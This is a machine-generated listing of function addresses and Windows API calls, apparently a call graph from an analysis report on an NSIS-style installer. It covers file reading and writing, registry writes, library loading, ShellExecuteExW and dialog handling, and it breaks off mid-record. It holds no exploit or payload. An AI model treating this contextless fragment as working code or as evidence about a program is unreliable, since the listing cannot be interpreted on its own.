WriteFile 3538->3577 3539->3368 3541 4061db ReadFile 3540->3541 3542 4035f5 3541->3542 3542->3367 3543->3357 3545 406a8e PeekMessageW 3544->3545 3546 406a84 DispatchMessageW 3545->3546 3547 406a9e 3545->3547 3546->3545 3547->3517 3549 403021 3548->3549 3550 403023 MulDiv 3548->3550 3549->3550 3550->3521 3552 4056e5 3551->3552 3553 4030a8 3551->3553 3554 405701 lstrlenW 3552->3554 3555 4066a5 17 API calls 3552->3555 3553->3517 3556 40572a 3554->3556 3557 40570f lstrlenW 3554->3557 3555->3554 3558 405730 SetWindowTextW 3556->3558 3559 40573d 3556->3559 3557->3553 3560 405721 lstrcatW 3557->3560 3558->3559 3559->3553 3561 405743 SendMessageW SendMessageW SendMessageW 3559->3561 3560->3556 3561->3553 3563 4035d1 3562->3563 3564 4034a7 3562->3564 3565 40302e 32 API calls 3563->3565 3579 4035f8 SetFilePointer 3564->3579 3572 4033a3 3565->3572 3567 4034b2 SetFilePointer 3571 4034d7 3567->3571 3568 4035e2 ReadFile 3568->3571 3570 40302e 32 API calls 3570->3571 3571->3568 3571->3570 3571->3572 3573 40620a WriteFile 3571->3573 3574 4035b2 SetFilePointer 3571->3574 3580 406bb0 3571->3580 3572->3539 3575 4061db ReadFile 3572->3575 3573->3571 3574->3563 3576 4033bc 3575->3576 3576->3532 3576->3539 3578 406228 3577->3578 3578->3538 3579->3567 3581 406bd5 3580->3581 3582 406bdd 3580->3582 3581->3571 3582->3581 3583 406c64 GlobalFree 3582->3583 3584 406c6d GlobalAlloc 3582->3584 3585 406ce4 GlobalAlloc 3582->3585 3586 406cdb GlobalFree 3582->3586 3583->3584 3584->3581 3584->3582 3585->3581 3585->3582 3586->3585 3588 404001 3587->3588 3609 4065af wsprintfW 3588->3609 3590 404072 3610 4040a6 3590->3610 3592 403da2 3592->3382 3593 404077 3593->3592 3594 4066a5 17 API calls 3593->3594 3594->3593 3595->3378 3613 4064d5 3596->3613 3599 403d73 3599->3377 3599->3379 3600 40656a RegQueryValueExW RegCloseKey 3600->3599 3601->3384 3617 404610 3602->3617 3604 4057e7 3605 404610 SendMessageW 3604->3605 3607 4057f9 OleUninitialize 3605->3607 3606 4057c0 3606->3604 3620 401389 3606->3620 3607->3414 3609->3590 3611 4066a5 17 API calls 3610->3611 3612 4040b4 SetWindowTextW 3611->3612 3612->3593 3614 4064e4 3613->3614 3615 4064e8 3614->3615 3616 4064ed RegOpenKeyExW 3614->3616 3615->3599 3615->3600 3616->3615 3618 404628 3617->3618 3619 404619 SendMessageW 3617->3619 3618->3606 3619->3618 3622 401390 3620->3622 3621 4013fe 3621->3606 3622->3621 3623 4013cb MulDiv SendMessageW 3622->3623 3623->3622 3624->3428 3626 405fff 3625->3626 3628 406011 3625->3628 3627 40600c CharNextW 3626->3627 3626->3628 3630 406035 3627->3630 3629 405f64 CharNextW 3628->3629 3628->3630 3629->3628 3630->3431 3630->3432 3632 4069b4 FindClose 3631->3632 3633 4069bf 3631->3633 3632->3633 3633->3438 3634->3459 3635->3459 3636->3457 3638 406304 GetShortPathNameW 3637->3638 3639 4062de 3637->3639 3640 406423 3638->3640 3641 406319 3638->3641 3664 406158 GetFileAttributesW CreateFileW 3639->3664 3640->3473 3641->3640 3643 406321 wsprintfA 3641->3643 3645 4066a5 17 API calls 3643->3645 3644 4062e8 CloseHandle GetShortPathNameW 3644->3640 3646 4062fc 3644->3646 3647 406349 3645->3647 3646->3638 3646->3640 3665 406158 GetFileAttributesW CreateFileW 3647->3665 3649 406356 3649->3640 3650 406365 GetFileSize GlobalAlloc 3649->3650 3651 406387 3650->3651 3652 40641c CloseHandle 3650->3652 3653 4061db ReadFile 3651->3653 3652->3640 3654 40638f 3653->3654 3654->3652 3666 4060bd lstrlenA 3654->3666 3657 4063a6 lstrcpyA 3660 4063c8 3657->3660 3658 4063ba 3659 4060bd 4 API calls 3658->3659 3659->3660 3661 4063ff SetFilePointer 3660->3661 3662 40620a WriteFile 3661->3662 3663 406415 GlobalFree 3662->3663 3663->3652 3664->3644 3665->3649 3667 4060fe lstrlenA 3666->3667 3668 406106 3667->3668 3669 4060d7 lstrcmpiA 3667->3669 3668->3657 3668->3658 3669->3668 3670 4060f5 CharNextA 3669->3670 3670->3667 3671 401941 3672 401943 3671->3672 3677 402da6 3672->3677 3678 402db2 3677->3678 3679 4066a5 17 API calls 3678->3679 3680 402dd3 3679->3680 3681 401948 3680->3681 3682 4068ef 5 API calls 3680->3682 3683 405d74 3681->3683 3682->3681 3684 40603f 18 API calls 3683->3684 3685 405d94 3684->3685 3686 405d9c DeleteFileW 3685->3686 3687 405db3 3685->3687 3691 401951 3686->3691 3688 405ed3 3687->3688 3719 406668 lstrcpynW 3687->3719 3688->3691 3695 40699e 2 API calls 3688->3695 3690 405dd9 3692 405dec 3690->3692 3693 405ddf lstrcatW 3690->3693 3694 405f83 2 API calls 3692->3694 3696 405df2 3693->3696 3694->3696 3698 405ef8 3695->3698 3697 405e02 lstrcatW 3696->3697 3699 405e0d lstrlenW FindFirstFileW 3696->3699 3697->3699 3698->3691 3700 405f37 3 API calls 3698->3700 3699->3688 3717 405e2f 3699->3717 3701 405f02 3700->3701 3703 405d2c 5 API calls 3701->3703 3702 405eb6 FindNextFileW 3706 405ecc FindClose 3702->3706 3702->3717 3705 405f0e 3703->3705 3707 405f12 3705->3707 3708 405f28 3705->3708 3706->3688 3707->3691 3711 4056ca 24 API calls 3707->3711 3710 4056ca 24 API calls 3708->3710 3710->3691 3713 405f1f 3711->3713 3712 405d74 60 API calls 3712->3717 3715 406428 36 API calls 3713->3715 3714 4056ca 24 API calls 3714->3702 3715->3691 3716 4056ca 24 API calls 3716->3717 3717->3702 3717->3712 3717->3714 3717->3716 3718 406428 36 API calls 3717->3718 3720 406668 lstrcpynW 3717->3720 3721 405d2c 3717->3721 3718->3717 3719->3690 3720->3717 3729 406133 GetFileAttributesW 3721->3729 3724 405d47 RemoveDirectoryW 3727 405d55 3724->3727 3725 405d4f DeleteFileW 3725->3727 3726 405d59 3726->3717 3727->3726 3728 405d65 SetFileAttributesW 3727->3728 3728->3726 3730 405d38 3729->3730 3731 406145 SetFileAttributesW 3729->3731 3730->3724 3730->3725 3730->3726 3731->3730 3732 4015c1 3733 402da6 17 API calls 3732->3733 3734 4015c8 3733->3734 3735 405fe2 4 API calls 3734->3735 3747 4015d1 3735->3747 3736 401631 3737 401663 3736->3737 3738 401636 3736->3738 3742 401423 24 API calls 3737->3742 3751 401423 3738->3751 3739 405f64 CharNextW 3739->3747 3748 40165b 3742->3748 3744 405c16 2 API calls 3744->3747 3745 405c33 5 API calls 3745->3747 3746 40164a SetCurrentDirectoryW 3746->3748 3747->3736 3747->3739 3747->3744 3747->3745 3749 401617 GetFileAttributesW 3747->3749 3750 405b99 4 API calls 3747->3750 3749->3747 3750->3747 3752 4056ca 24 API calls 3751->3752 3753 401431 3752->3753 3754 406668 lstrcpynW 3753->3754 3754->3746 3935 401c43 3957 402d84 3935->3957 3937 401c4a 3938 402d84 17 API calls 3937->3938 3939 401c57 3938->3939 3940 402da6 17 API calls 3939->3940 3941 401c6c 3939->3941 3940->3941 3942 401c7c 3941->3942 3943 402da6 17 API calls 3941->3943 3944 401cd3 3942->3944 3945 401c87 3942->3945 3943->3942 3947 402da6 17 API calls 3944->3947 3946 402d84 17 API calls 3945->3946 3949 401c8c 3946->3949 3948 401cd8 3947->3948 3950 402da6 17 API calls 3948->3950 3951 402d84 17 API calls 3949->3951 3952 401ce1 FindWindowExW 3950->3952 3953 401c98 3951->3953 3956 401d03 3952->3956 3954 401cc3 SendMessageW 3953->3954 3955 401ca5 SendMessageTimeoutW 3953->3955 3954->3956 3955->3956 3958 4066a5 17 API calls 3957->3958 3959 402d99 3958->3959 3959->3937 3967 4028c4 3968 4028ca 3967->3968 3969 4028d2 FindClose 3968->3969 3970 402c2a 3968->3970 3969->3970 3776 4040c5 3777 4040dd 3776->3777 3778 40423e 3776->3778 3777->3778 3779 4040e9 3777->3779 3780 40424f GetDlgItem GetDlgItem 3778->3780 3785 40428f 3778->3785 3782 4040f4 SetWindowPos 3779->3782 3783 404107 3779->3783 3852 4045c4 3780->3852 3781 4042e9 3786 404610 SendMessageW 3781->3786 3794 404239 3781->3794 3782->3783 3787 404110 ShowWindow 3783->3787 3788 404152 3783->3788 3785->3781 3793 401389 2 API calls 3785->3793 3817 4042fb 3786->3817 3795 404130 GetWindowLongW 3787->3795 3796 40422b 3787->3796 3790 404171 3788->3790 3791 40415a DestroyWindow 3788->3791 3789 404279 KiUserCallbackDispatcher 3792 40140b 2 API calls 3789->3792 3798 404176 SetWindowLongW 3790->3798 3799 404187 3790->3799 3797 40456e 3791->3797 3792->3785 3800 4042c1 3793->3800 3795->3796 3802 404149 ShowWindow 3795->3802 3858 40462b 3796->3858 3797->3794 3809 40457e ShowWindow 3797->3809 3798->3794 3799->3796 3803 404193 GetDlgItem 3799->3803 3800->3781 3804 4042c5 SendMessageW 3800->3804 3802->3788 3807 4041c1 3803->3807 3808 4041a4 SendMessageW IsWindowEnabled 3803->3808 3804->3794 3805 40140b 2 API calls 3805->3817 3806 40454f DestroyWindow EndDialog 3806->3797 3811 4041ce 3807->3811 3814 404215 SendMessageW 3807->3814 3815 4041e1 3807->3815 3823 4041c6 3807->3823 3808->3794 3808->3807 3809->3794 3810 4066a5 17 API calls 3810->3817 3811->3814 3811->3823 3813 4045c4 18 API calls 3813->3817 3814->3796 3818 4041e9 3815->3818 3819 4041fe 3815->3819 3816 4041fc 3816->3796 3817->3805 3817->3806 3817->3810 3817->3813 3824 4045c4 18 API calls 3817->3824 3821 40140b 2 API calls 3818->3821 3820 40140b 2 API calls 3819->3820 3822 404205 3820->3822 3821->3823 3822->3796 3822->3823 3855 40459d 3823->3855 3825 404376 GetDlgItem 3824->3825 3826 404393 ShowWindow EnableWindow 3825->3826 3827 40438b 3825->3827 3872 4045e6 EnableWindow 3826->3872 3827->3826 3829 4043bd EnableWindow 3834 4043d1 3829->3834 3830 4043d6 GetSystemMenu EnableMenuItem SendMessageW 3831 404406 SendMessageW 3830->3831 3830->3834 3831->3834 3833 4040a6 18 API calls 3833->3834 3834->3830 3834->3833 3873 4045f9 SendMessageW 3834->3873 3874 406668 lstrcpynW 3834->3874 3836 404435 lstrlenW 3837 4066a5 17 API calls 3836->3837 3838 40444b SetWindowTextW 3837->3838 3839 401389 2 API calls 3838->3839 3840 40445c 3839->3840 3840->3794 3840->3817 3841 40448f DestroyWindow 3840->3841 3843 40448a 3840->3843 3841->3797 3842 4044a9 CreateDialogParamW 3841->3842 3842->3797 3844 4044dc 3842->3844 3843->3794 3845 4045c4 18 API calls 3844->3845 3846 4044e7 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3845->3846 3847 401389 2 API calls 3846->3847 3848 40452d 3847->3848 3848->3794 3849 404535 ShowWindow 3848->3849 3850 404610 SendMessageW 3849->3850 3851 40454d 3850->3851 3851->3797 3853 4066a5 17 API calls 3852->3853 3854 4045cf SetDlgItemTextW 3853->3854 3854->3789 3856 4045a4 3855->3856 3857 4045aa SendMessageW 3855->3857 3856->3857 3857->3816 3859 4046ee 3858->3859 3860 404643 GetWindowLongW 3858->3860 3859->3794 3860->3859 3861 404658 3860->3861 3861->3859 3862 404685 GetSysColor 3861->3862 3863 404688 3861->3863 3862->3863 3864 404698 SetBkMode 3863->3864 3865 40468e SetTextColor 3863->3865 3866 4046b0 GetSysColor 3864->3866 3867 4046b6 3864->3867 3865->3864 3866->3867 3868 4046c7 3867->3868 3869 4046bd SetBkColor 3867->3869 3868->3859 3870 4046e1 CreateBrushIndirect 3868->3870 3871 4046da DeleteObject 3868->3871 3869->3868 3870->3859 3871->3870 3872->3829 3873->3834 3874->3836 3974 4016cc 3975 402da6 17 API calls 3974->3975 3976 4016d2 GetFullPathNameW 3975->3976 3977 4016ec 3976->3977 3983 40170e 3976->3983 3979 40699e 2 API calls 3977->3979 3977->3983 3978 401723 GetShortPathNameW 3980 402c2a 3978->3980 3981 4016fe 3979->3981 3981->3983 3984 406668 lstrcpynW 3981->3984 3983->3978 3983->3980 3984->3983 3985 401e4e GetDC 3986 402d84 17 API calls 3985->3986 3987 401e60 GetDeviceCaps MulDiv ReleaseDC 3986->3987 3988 402d84 17 API calls 3987->3988 3989 401e91 3988->3989 3990 4066a5 17 API calls 3989->3990 3991 401ece CreateFontIndirectW 3990->3991 3992 402638 3991->3992 3992->3992 3993 402950 3994 402da6 17 API calls 3993->3994 3996 40295c 3994->3996 3995 402972 3998 406133 2 API calls 3995->3998 3996->3995 3997 402da6 17 API calls 3996->3997 3997->3995 3999 402978 3998->3999 4021 406158 GetFileAttributesW CreateFileW 3999->4021 4001 402985 4002 402a3b 4001->4002 4003 4029a0 GlobalAlloc 4001->4003 4004 402a23 4001->4004 4005 402a42 DeleteFileW 4002->4005 4006 402a55 4002->4006 4003->4004 4007 4029b9 4003->4007 4008 403371 44 API calls 4004->4008 4005->4006 4022 4035f8 SetFilePointer 4007->4022 4010 402a30 CloseHandle 4008->4010 4010->4002 4011 4029bf 4012 4035e2 ReadFile 4011->4012 4013 4029c8 GlobalAlloc 4012->4013 4014 4029d8 4013->4014 4015 402a0c 4013->4015 4016 403371 44 API calls 4014->4016 4017 40620a WriteFile 4015->4017 4020 4029e5 4016->4020 4018 402a18 GlobalFree 4017->4018 4018->4004 4019 402a03 GlobalFree 4019->4015 4020->4019 4021->4001 4022->4011 4030 403cd5 4031 403ce0 4030->4031 4032 403ce4 4031->4032 4033 403ce7 GlobalAlloc 4031->4033 4033->4032 4034 401956 4035 402da6 17 API calls 4034->4035 4036 40195d lstrlenW 4035->4036 4037 402638 4036->4037 4038 4014d7 4039 402d84 17 API calls 4038->4039 4040 4014dd Sleep 4039->4040 4042 402c2a 4040->4042 4043 4020d8 4044 4020ea 4043->4044 4054 40219c 4043->4054 4045 402da6 17 API calls 4044->4045 4046 4020f1 4045->4046 4048 402da6 17 API calls 4046->4048 4047 401423 24 API calls 4050 4022f6 4047->4050 4049 4020fa 4048->4049 4051 402110 LoadLibraryExW 4049->4051 4052 402102 GetModuleHandleW 4049->4052 4053 402121 4051->4053 4051->4054 4052->4051 4052->4053 4063 406aa4 4053->4063 4054->4047 4057 402132 4060 401423 24 API calls 4057->4060 4061 402142 4057->4061 4058 40216b 4059 4056ca 24 API calls 4058->4059 4059->4061 4060->4061 4061->4050 4062 40218e FreeLibrary 4061->4062 4062->4050 4068 40668a WideCharToMultiByte 4063->4068 4065 406ac1 4066 406ac8 GetProcAddress 4065->4066 4067 40212c 4065->4067 4066->4067 4067->4057 4067->4058 4068->4065 4069 402b59 4070 402b60 4069->4070 4071 402bab 4069->4071 4073 402ba9 4070->4073 4075 402d84 17 API calls 4070->4075 4072 406a35 5 API calls 4071->4072 4074 402bb2 4072->4074 4076 402da6 17 API calls 4074->4076 4077 402b6e 4075->4077 4078 402bbb 4076->4078 4079 402d84 17 API calls 4077->4079 4078->4073 4080 402bbf IIDFromString 4078->4080 4082 402b7a 4079->4082 4080->4073 4081 402bce 4080->4081 4081->4073 4087 406668 lstrcpynW 4081->4087 4086 4065af wsprintfW 4082->4086 4085 402beb CoTaskMemFree 4085->4073 4086->4073 4087->4085 4088 402a5b 4089 402d84 17 API calls 4088->4089 4090 402a61 4089->4090 4091 402aa4 4090->4091 4092 402a88 4090->4092 4097 40292e 4090->4097 4094 402abe 4091->4094 4095 402aae 4091->4095 4093 402a8d 4092->4093 4101 402a9e 4092->4101 4102 406668 lstrcpynW 4093->4102 4096 4066a5 17 API calls 4094->4096 4098 402d84 17 API calls 4095->4098 4096->4101 4098->4101 4101->4097 4103 4065af wsprintfW 4101->4103 4102->4097 4103->4097 3888 40175c 3889 402da6 17 API calls 3888->3889 3890 401763 3889->3890 3891 406187 2 API calls 3890->3891 3892 40176a 3891->3892 3893 406187 2 API calls 3892->3893 3893->3892 4104 401d5d 4105 402d84 17 API calls 4104->4105 4106 401d6e SetWindowLongW 4105->4106 4107 402c2a 4106->4107 4108 4028de 4109 4028e6 4108->4109 4110 4028ea FindNextFileW 4109->4110 4112 4028fc 4109->4112 4111 402943 4110->4111 4110->4112 4114 406668 lstrcpynW 4111->4114 4114->4112 4115 406d5f 4121 406be3 4115->4121 4116 40754e 4117 406c64 GlobalFree 4118 406c6d GlobalAlloc 4117->4118 4118->4116 4118->4121 4119 406ce4 GlobalAlloc 4119->4116 4119->4121 4120 406cdb GlobalFree 4120->4119 4121->4116 4121->4117 4121->4118 4121->4119 4121->4120 4122 401563 4123 402ba4 4122->4123 4126 4065af wsprintfW 4123->4126 4125 402ba9 4126->4125 4127 401968 4128 402d84 17 API calls 4127->4128 4129 40196f 4128->4129 4130 402d84 17 API calls 4129->4130 4131 40197c 4130->4131 4132 402da6 17 API calls 4131->4132 4133 401993 lstrlenW 4132->4133 4135 4019a4 4133->4135 4134 4019e5 4135->4134 4139 406668 lstrcpynW 4135->4139 4137 4019d5 4137->4134 4138 4019da lstrlenW 4137->4138 4138->4134 4139->4137 4147 40166a 4148 402da6 17 API calls 4147->4148 4149 401670 4148->4149 4150 40699e 2 API calls 4149->4150 4151 401676 4150->4151 4152 402aeb 4153 402d84 17 API calls 4152->4153 4154 402af1 4153->4154 4155 4066a5 17 API calls 4154->4155 4156 40292e 4154->4156 4155->4156 4157 4026ec 4158 402d84 17 API calls 4157->4158 4159 4026fb 4158->4159 4160 402745 ReadFile 4159->4160 4161 4061db ReadFile 4159->4161 4163 402785 MultiByteToWideChar 4159->4163 4164 40283a 4159->4164 4166 4027ab SetFilePointer MultiByteToWideChar 4159->4166 4167 40284b 4159->4167 4169 402838 4159->4169 4170 406239 SetFilePointer 4159->4170 4160->4159 4160->4169 4161->4159 4163->4159 4179 4065af wsprintfW 4164->4179 4166->4159 4168 40286c SetFilePointer 4167->4168 4167->4169 4168->4169 4171 406255 4170->4171 4174 40626d 4170->4174 4172 4061db ReadFile 4171->4172 4173 406261 4172->4173 4173->4174 4175 406276 SetFilePointer 4173->4175 4176 40629e SetFilePointer 4173->4176 4174->4159 4175->4176 4177 406281 4175->4177 4176->4174 4178 40620a WriteFile 4177->4178 4178->4174 4179->4169 4180 404a6e 4181 404aa4 4180->4181 4182 404a7e 4180->4182 4184 40462b 8 API calls 4181->4184 4183 4045c4 18 API calls 4182->4183 4185 404a8b SetDlgItemTextW 4183->4185 4186 404ab0 4184->4186 4185->4181 3894 40176f 3895 402da6 17 API calls 3894->3895 3896 401776 3895->3896 3897 401796 3896->3897 3898 40179e 3896->3898 3933 406668 lstrcpynW 3897->3933 3934 406668 lstrcpynW 3898->3934 3901 40179c 3905 4068ef 5 API calls 3901->3905 3902 4017a9 3903 405f37 3 API calls 3902->3903 3904 4017af lstrcatW 3903->3904 3904->3901 3925 4017bb 3905->3925 3906 40699e 2 API calls 3906->3925 3907 406133 2 API calls 3907->3925 3909 4017cd CompareFileTime 3909->3925 3910 40188d 3912 4056ca 24 API calls 3910->3912 3911 401864 3913 4056ca 24 API calls 3911->3913 3921 401879 3911->3921 3914 401897 3912->3914 3913->3921 3915 403371 44 API calls 3914->3915 3916 4018aa 3915->3916 3917 4018be SetFileTime 3916->3917 3918 4018d0 FindCloseChangeNotification 3916->3918 3917->3918 3920 4018e1 3918->3920 3918->3921 3919 4066a5 17 API calls 3919->3925 3923 4018e6 3920->3923 3924 4018f9 3920->3924 3922 406668 lstrcpynW 3922->3925 3926 4066a5 17 API calls 3923->3926 3927 4066a5 17 API calls 3924->3927 3925->3906 3925->3907 3925->3909 3925->3910 3925->3911 3925->3919 3925->3922 3928 405cc8 MessageBoxIndirectW 3925->3928 3932 406158 GetFileAttributesW CreateFileW 3925->3932 3929 4018ee lstrcatW 3926->3929 3930 401901 3927->3930 3928->3925 3929->3930 3931 405cc8 MessageBoxIndirectW 3930->3931 3931->3921 3932->3925 3933->3901 3934->3902 4187 401a72 4188 402d84 17 API calls 4187->4188 4189 401a7b 4188->4189 4190 402d84 17 API calls 4189->4190 4191 401a20 4190->4191 4192 401573 4193 401583 ShowWindow 4192->4193 4194 40158c 4192->4194 4193->4194 4195 402c2a 4194->4195 4196 40159a ShowWindow 4194->4196 4196->4195 4197 4023f4 4198 402da6 17 API calls 4197->4198 4199 402403 4198->4199 4200 402da6 17 API calls 4199->4200 4201 40240c 4200->4201 4202 402da6 17 API calls 4201->4202 4203 402416 GetPrivateProfileStringW 4202->4203 4204 4014f5 SetForegroundWindow 4205 402c2a 4204->4205 4206 401ff6 4207 402da6 17 API calls 4206->4207 4208 401ffd 4207->4208 4209 40699e 2 API calls 4208->4209 4210 402003 4209->4210 4212 402014 4210->4212 4213 4065af wsprintfW 4210->4213 4213->4212 4214 401b77 4215 402da6 17 API calls 4214->4215 4216 401b7e 4215->4216 4217 402d84 17 API calls 4216->4217 4218 401b87 wsprintfW 4217->4218 4219 402c2a 4218->4219 4220 4046fa lstrcpynW lstrlenW 4221 40167b 4222 402da6 17 API calls 4221->4222 4223 401682 4222->4223 4224 402da6 17 API calls 4223->4224 4225 40168b 4224->4225 4226 402da6 17 API calls 4225->4226 4227 401694 MoveFileW 4226->4227 4228 4016a0 4227->4228 4229 4016a7 4227->4229 4231 401423 24 API calls 4228->4231 4230 40699e 2 API calls 4229->4230 4233 4022f6 4229->4233 4232 4016b6 4230->4232 4231->4233 4232->4233 4234 406428 36 API calls 4232->4234 4234->4228 4242 4019ff 4243 402da6 17 API calls 4242->4243 4244 401a06 4243->4244 4245 402da6 17 API calls 4244->4245 4246 401a0f 4245->4246 4247 401a16 lstrcmpiW 4246->4247 4248 401a28 lstrcmpW 4246->4248 4249 401a1c 4247->4249 4248->4249 4250 4022ff 4251 402da6 17 API calls 4250->4251 4252 402305 4251->4252 4253 402da6 17 API calls 4252->4253 4254 40230e 4253->4254 4255 402da6 17 API calls 4254->4255 4256 402317 4255->4256 4257 40699e 2 API calls 4256->4257 4258 402320 4257->4258 4259 402331 lstrlenW lstrlenW 4258->4259 4260 402324 4258->4260 4262 4056ca 24 API calls 4259->4262 4261 4056ca 24 API calls 4260->4261 4264 40232c 4260->4264 4261->4264 4263 40236f SHFileOperationW 4262->4263 4263->4260 4263->4264 4265 401000 4266 401037 BeginPaint GetClientRect 4265->4266 4267 40100c DefWindowProcW 4265->4267 4269 4010f3 4266->4269 4270 401179 4267->4270 4271 401073 CreateBrushIndirect FillRect DeleteObject 4269->4271 4272 4010fc 4269->4272 4271->4269 4273 401102 CreateFontIndirectW 4272->4273 4274 401167 EndPaint 4272->4274 4273->4274 4275 401112 6 API calls 4273->4275 4274->4270 4275->4274 4276 401d81 4277 401d94 GetDlgItem 4276->4277 4278 401d87 4276->4278 4280 401d8e 4277->4280 4279 402d84 17 API calls 4278->4279 4279->4280 4281 401dd5 GetClientRect LoadImageW SendMessageW 4280->4281 4283 402da6 17 API calls 4280->4283 4284 401e33 4281->4284 4286 401e3f 4281->4286 4283->4281 4285 401e38 DeleteObject 4284->4285 4284->4286 4285->4286 4287 401503 4288 40150b 4287->4288 4290 40151e 4287->4290 4289 402d84 17 API calls 4288->4289 4289->4290 4291 404783 4292 40479b 4291->4292 4296 4048b5 4291->4296 4297 4045c4 18 API calls 4292->4297 4293 40491f 4294 4049e9 4293->4294 4295 404929 GetDlgItem 4293->4295 4302 40462b 8 API calls 4294->4302 4298 404943 4295->4298 4299 4049aa 4295->4299 4296->4293 4296->4294 4300 4048f0 GetDlgItem SendMessageW 4296->4300 4301 404802 4297->4301 4298->4299 4307 404969 SendMessageW LoadCursorW SetCursor 4298->4307 4299->4294 4303 4049bc 4299->4303 4324 4045e6 EnableWindow 4300->4324 4305 4045c4 18 API calls 4301->4305 4306 4049e4 4302->4306 4308 4049d2 4303->4308 4309 4049c2 SendMessageW 4303->4309 4311 40480f CheckDlgButton 4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 